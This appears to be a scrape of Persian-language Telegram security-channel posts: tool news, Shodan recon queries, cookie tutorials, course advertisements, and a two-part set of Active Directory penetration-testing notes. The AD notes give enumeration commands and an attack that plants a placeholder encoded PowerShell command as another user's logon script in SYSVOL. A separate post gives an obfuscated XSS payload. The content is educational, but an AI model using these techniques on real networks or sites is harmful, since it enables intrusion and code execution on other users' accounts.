Try Hack Box

ابزار PwnFox افزونه‌ ای برای Firefox/Burp Suite که ابزارهای مفیدی برای یک باگ‌ هانتر فراهم می‌ کند: ✅ راه‌اندازی BurpProxy با یک کلیک ✅ پروفایل‌های Container برای استفاده از چند حساب کاربری در یک مرورگر ✅ ثبت (لاگ) پیام‌های PostMessage ✅ جعبه‌ابزار (Toolbox) و ابزارهای دیگر این autochrome چیزی مشابه برای Chrome (یا Chromium). @TryHackBox #BugBounty #Tools

مهندسی معکوس از Kaspersky Lab به‌تازگی تیمِ «مرکز جهانی تحقیقات و تحلیل تهدیدات» ابزار جدیدی به نام hrtng را با جامعه به اشتراک گذاشته است. این ابزارپلاگین برای IDA Proro است که روند مهندسی معکوس نمونه‌ های پیچیده را ساده و قابل‌مدیریت‌ تر می‌کند. دقیقاً چگونه؟ در این راهنما بخوانید راهنمایی عملی که تحلیل یک مؤلفه از بدافزار جاسFinSpypy را نمایش می‌ دهد و چند نکتهٔ کلی و کاربردی برای کار با IDA ارائه می‌ کند. https://securelist.com/hrtng-ida-pro-plugin/114780/ #reverse #practice @PfkSecurity

🔖 تقویت امن و مطمئن ویندوز با استفاده از روش‌های رسمی مایکروسافت و راهنماهای جامع: یک ریپازیتوری کاربردی برای هکرهای اخلاقی اگر حفظ حریم خصوصی براتون مهمه، هر سیستمی که روی اون کار می‌ کنید باید شخصی‌ سازی بشه. هدف این ریپازیتوری دقیقاً همینه کمک به شما برای پیکربندی فقط ابزارها و قابلیت‌ هایی که مایکروسافت در ویندوز پیاده‌ سازی کرده، تا بتونید امنیت رو به حداکثر برسونید و دسترسی‌ها رو محدود کنید؛ اون هم با استفاده از روش‌های مستند، پشتیبانی‌ شده، توصیه‌ شده و رسمی

Install-Module -Name 'Harden-Windows-Security-Module' -Force

👩‍💻 گیت‌هاب & سایت @TryHackBox #امنیت

🔖 مجموعه‌ای از کوئری‌ های Shodan که میتوان در جریان Reconnaissance (مرحله شناسایی) استفاده کرد: فیلتر بر اساس سازمان:

  org:"Example"
  

فیلتر بر اساس فرم‌ های ورود (Login Pages):

  http.title:"Login"
  

فیلتر بر اساس هاست‌ هایی که از گواهی‌ های SSL موردنظر استفاده می‌ کنند:

  ssl:"example\.com" || ssl.cert.subject.cn:"example\.com"
  

فیلتر بر اساس وب‌سرور Apache:

  server:"Apache"
  

فیلتر بر اساس هاست‌ های مرتبط با نود تارگت از طریق هش (favicon hash):

  http.favicon.hash:0123456789
  

#recon #tips @TryHackBox

✨ سلام به همه دوستان خوبم -✨ 🔒 متأسفانه کانال قبلی ما توسط تلگرام بسته شد، اما خبر خوب اینه که دوباره با قدرت بیشتر و محتوای جذاب‌تر برگشتیم! اینجا قراره دوباره شروع کنیم: ✅ آموزش‌های حرفه‌ای هک و امنیت (کاملاً قانونی و آموزشی) ✅ نکات و مطالب برنامه‌نویسی ✅ دوره‌های آموزشی ارزشمند ✅ طنزهای خفن کامپیوتری برای لحظات فان 😎 🔥 ما تازه شروع کردیم و قراره خیلی سورپرایز داشته باشیم... اگه می‌خوای اولین نفر باشی که محتوای جدید رو می‌بینه، همین الان عضو شو 👇 ارادتمند شما - سجاد تیموری 🆔 @Sajjad_Teymouri

⭕ یادداشت‌ های اکسپلویت از تست نفوذ Active Directory - بخش دوم    3. آپلود داده‌ های جمع‌آوری‌ شده (Upload Collected Data)  پس از اجرا، فایل‌های نتیجه (*.json) در دایرکتوری فعلی تولید می‌ شوند. تمام این فایل‌های JSON را به BloodHound در مرورگر وب آپلود کنید.  می‌توانیم روابط در Active Directory را کاوش کنیم. بررسی (Investigation) فهرست همه کاربران

net user /domain
net user <username> /domain
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server dc.example.com -Properties *
Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A

فهرست همه گروه‌ها

net group /domain
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com

فهرست سیاست رمز عبور

net accounts /domain
# فهرست اشیاء AD
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com

بازیابی اطلاعات در مورد دامنه داده‌ شده.

Get-ADDomain -Server dc.example.com

تغییر رمز عبور کاربر AD

Set-ADAccountPassword -Identity <username> -Server dc.example.com -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)
# SYSVOL 

یک پوشه اشتراکی که Group Policy Objects (GPOs) را ذخیره می‌ کند.

dir \\dc.example.com\SYSVOL\

سوءاستفاده از اسکریپت ورود برای کاربران دیگر (Abuse Logon Script for Other Users) اگر کاربر فعلی مجوز نوشتن اسکریپت‌ ها در SYSVOL را داشته باشد، ممکن است بتوانیم مسیر اسکریپت ورود کاربران دیگر را تغییر دهیم. 1. بررسی مجوز

icacls C:\Windows\SYSVOL\sysvol\example.local\scripts\

2. تغییر/اضافه کردن یک اسکریپت مخرب

'powershell -e <BASE64_COMMAND>' | OutFile -FilePath C:\Windows\SYSVOL\sysvol\example.local\scripts\evil.bat

3. تنظیم اسکریپت ورود برای کاربر مشخص‌شده

Set-ADUser -Identity VictimUser -ScriptPath '\\example.local\SYSVOL\example.local\scripts\evil.bat

هنگامی که کاربر دیگر وارد سیستم می‌ شود، اسکریپت .bat اجرا خواهد شد. #NoteADExploit @KavehAPT

🚀 پارت 4 (B) 📝 ذخیره مستقیم اطلاعات با این حال، کوکی‌ها فقط به یک ID محدود نیستند. برخی سرورها انتخاب می‌کنند که اطلاعات را مستقیماً در کوکی نگه دارند. مثال: Cookie: name="Brian Totty"; phone="555-1212" 🎒 کوله پشتی کاربر (Cookie Jar) مرورگر، محتوای کوکی‌های ارسالی از سرور را در هدرهای Set-Cookie به خاطر می‌سپارد و مجموعه کوکی‌ها را در یک فضای ذخیره سازی به نام Cookie Jar ( like یک چمدان پر از برچسب های مختلف سرورها) ذخیره می کند. وقتی کاربر در آینده به همان سایت بازگردد، مرورگر، کوکی‌های مربوط به آن سرور را انتخاب کرده و آن‌ها را در هدر درخواست Cookie ارسال می‌کند. 🎯 هدف اصلی کوکی‌ها: State Management هدف اصلی کوکی‌ها این است که به مرورگر اجازه می‌دهند مجموعه‌ای از اطلاعات خاص یک سرور را جمع آوری کند و هر بار که کاربر آن سایت را باز می‌کند، این اطلاعات را به سرور ارائه دهد. از آنجایی که وظیفه ذخیره اطلاعات کوکی بر عهده مرورگر است، به این سیستم اصطلاحاً مدیریت状态 سمت کلاینت (Client-Side State) می‌گویند. مشخصات رسمی کوکی‌ها با نام HTTP State Management Mechanism شناخته می‌شود. 📁 مرورگرها و ذخیره سازی کوکی‌ها مرورگرهای مختلف، کوکی‌ها را به روش‌های مختلف ذخیره می‌کنند. مرورگر Netscape Navigator کوکی‌ها را در یک فایل متنی به نام cookies.txt ذخیره می‌کند. هر خط در این فایل نشان‌دهنده یک کوکی است و هفت فیلد دارد که با تب از هم جدا شده‌اند: domain: دامنه‌ای که کوکی به آن تعلق دارد. allh: اگر TRUE باشد، به این معنی است که همه میزبان‌های خاص در آن دامنه می‌توانند کوکی را دریافت کنند. path: مسیری در دامنه که با کوکی مرتبط است. secure: اگر TRUE باشد، کوکی فقط از طریق یک اتصال SSL امن ارسال می‌شود. expiration: زمان انقضای کوکی به شکل ثانیه از 1 ژانویه 1970, 00:00:00 GMT (مبدأ زمان یونیکس). name: نام متغیر کوکی. value: مقدار متغیر کوکی. ✍️نویسنده @TryHackBox | The Chaos #HTTP #Cookies #CyberSecurity

⭕ یادداشت‌ های اکسپلویت از تست نفوذ Active Directory - بخش اول دوستان من این مورد قبلا خونده بودم گفتم مطالب با شما هم به اشتراک بگذارم شاید براتون مفید باشه . اکتیودایرکتوری (AD) یک سرویس دایرکتوری است که توسط مایکروسافت برای شبکه‌ های دامنه ویندوز توسعه پیدا کرده است. شمارش یا Enumeration کشف یا Discovery کنترل‌ کننده‌های دامنه (Domain Controllers Discovery)

dig @<target-ip> example.local ANY
gobuster dns -d example.local -w subdomains.txt -t 25

شمارش با BloodHound 1. اجرای BloodHound  ما از BloodHound Community Edition استفاده میکنیم. دستور زیر Docker Compose BloodHound را شروع می‌ کند:   

curl -L https://ghst.ly/getbhce > docker-compose.yml
sudo docker-compose down -v # If you want to reset the password of BloodHound...
sudo docker-compose pull && sudo docker-compose up

    پس از آن، میتوانیم از رابط یا اینترفیس وب با دسترسی به localhost:8080 در مرورگر وب استفاده کنیم. با نام کاربری admin و رمز عبوری که در لاگ هنگام اجرای دستور بالا نمایش داده می‌شود، وارد شوید.  برای مشخص کردن IP و پورت دلخواه، متغیرهای محیطی را روی ماشین اتکر تنظیم کنید:  

  export BLOODHOUND_HOST=10.0.0.1
   export BLOODHOUND_PORT=8090

2. جمع‌ آوری داده‌ ها (Collect Data) گزینه 1. استفاده از NetExec اگر NetExec را در ماشین خود دارید، فکر میکنم ساده‌ ترین راه باشد.  

  netexec ldap <target-ip> -d example.local -u username -p password --dns-server <target-ip> --bloodhound -c All

      گزینه 2. استفاده از BloodHound.py ما همچنین میتوانیم از BloodHound.py استفاده کنیم. آن را به صورت زیر نصب کنید:  

python3 -m venv .venv
source .venv/bin/activate
pipx install bloodhound # or using 'pip3' instead of 'pipx'
bloodhound-python -h

   سپس داده‌ ها را جمع‌آوری کنید:     

   # -u: Username
   # -p: Password
   # -dc: Domain Controller
   # -c all: Collect all data
   # -ns: Alternate the nameserver
   bloodhound-python -d example.local -u username -p password -dc dc.example.local -c all -ns ns.example.local

   # If we cannot resolve the domain, try dnschef (https://github.com/iphelix/dnschef) to create a fake DNS by proxy.
   sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>
   

#NoteADExploit @KavehAPT

👩‍💻 عملگرهای انتساب منطقی در JavaScript برای بهره‌برداری از XSS به عنوان یک مثال دیگر از اهمیت دور شدن از پیلودهای معمولی.

window&&=(window&&=opener||=alert)?.(1??0,)

#bugbounty #tips @TryHackBox

🔔 اطلاعیه دوستان گرامی، محتوای آموزشی این مجموعه با صرف زمان و تلاش فراوان تهیه می‌شود. متأسفانه در مواردی دیده شده که مطالب بدون ذکر منبع بازنشر شده‌اند. ذکر منبع هنگام استفاده از محتوا، احترام به حقوق معنوی و تلاش تیم ماست و باعث می‌شود این روند آموزشی با انگیزه و استمرار بیشتری ادامه پیدا کند. از همراهی و توجه شما سپاسگزاریم و امیدواریم دیگر شاهد چنین مواردی نباشیم. @TryHackBox

🚀 پارت 4 (A) 🍪 کوکی‌ها (Cookies): از شناسایی تا ذخیره اطلاعات در پست قبل راجع به اساسيات کوکی‌ها صحبت کردیم. حالا بپردازیم به جزئیات بیشتر! 🔢 چه اطلاعاتی در کوکی ذخیره می‌شود؟ کوکی‌ها می‌توانند حاوی هر اطلاعاتی باشند، اما اغلب شامل یک شماره شناسه منحصر به فرد (Unique ID) هستند که توسط سرور برای اهداف بازیابی استفاده می‌شود. مثال: سرور یک کوکی با مقدار id=34294 برای کاربر قرار می‌دهد. سپس می‌تواند از این شماره برای جستجوی اطلاعات بیشتر کاربر (مانند تاریخچه خرید، آدرس و...) در پایگاه داده خودش استفاده کند. ✍️نویسنده @TryHackBox | The Chaos #HTTP #Cookies #CyberSecurity

❗️❗️بنا به درخواست دوستان طرح فروش فوق العاده دوره های هک و امنیت با تخفیف ویژه تمدید شد ❗️❗️ ۱ - دوره جامع پیش نیاز های تست نفوذ شامل : Network - Linux- Python- bash - mysql- - php - osint - js وضعیت دوره : به پایان رسیده قیمت : با تخفیف ویژه ۲.۵۰۰.۰۰۰ ۲- دوره آموزشی soc بازار کار وضعیت : اتمام دوره قیمت با تخفیف : ۴.۰۰۰.۰۰۰ ۳- دوره Python for blackhat وضعیت: در حال برگزاری قیمت با تخفیف : ۵.۵۰۰.۰۰۰ و... 📩 برای دریافت مشاوره رایگان و ثبت‌نام، از طریق آیدی تلگرام زیر در تماس باش: 👉 @steymouri93 مارو به دوستاتون معرفی کنید. 🆔 @sajjadteymouri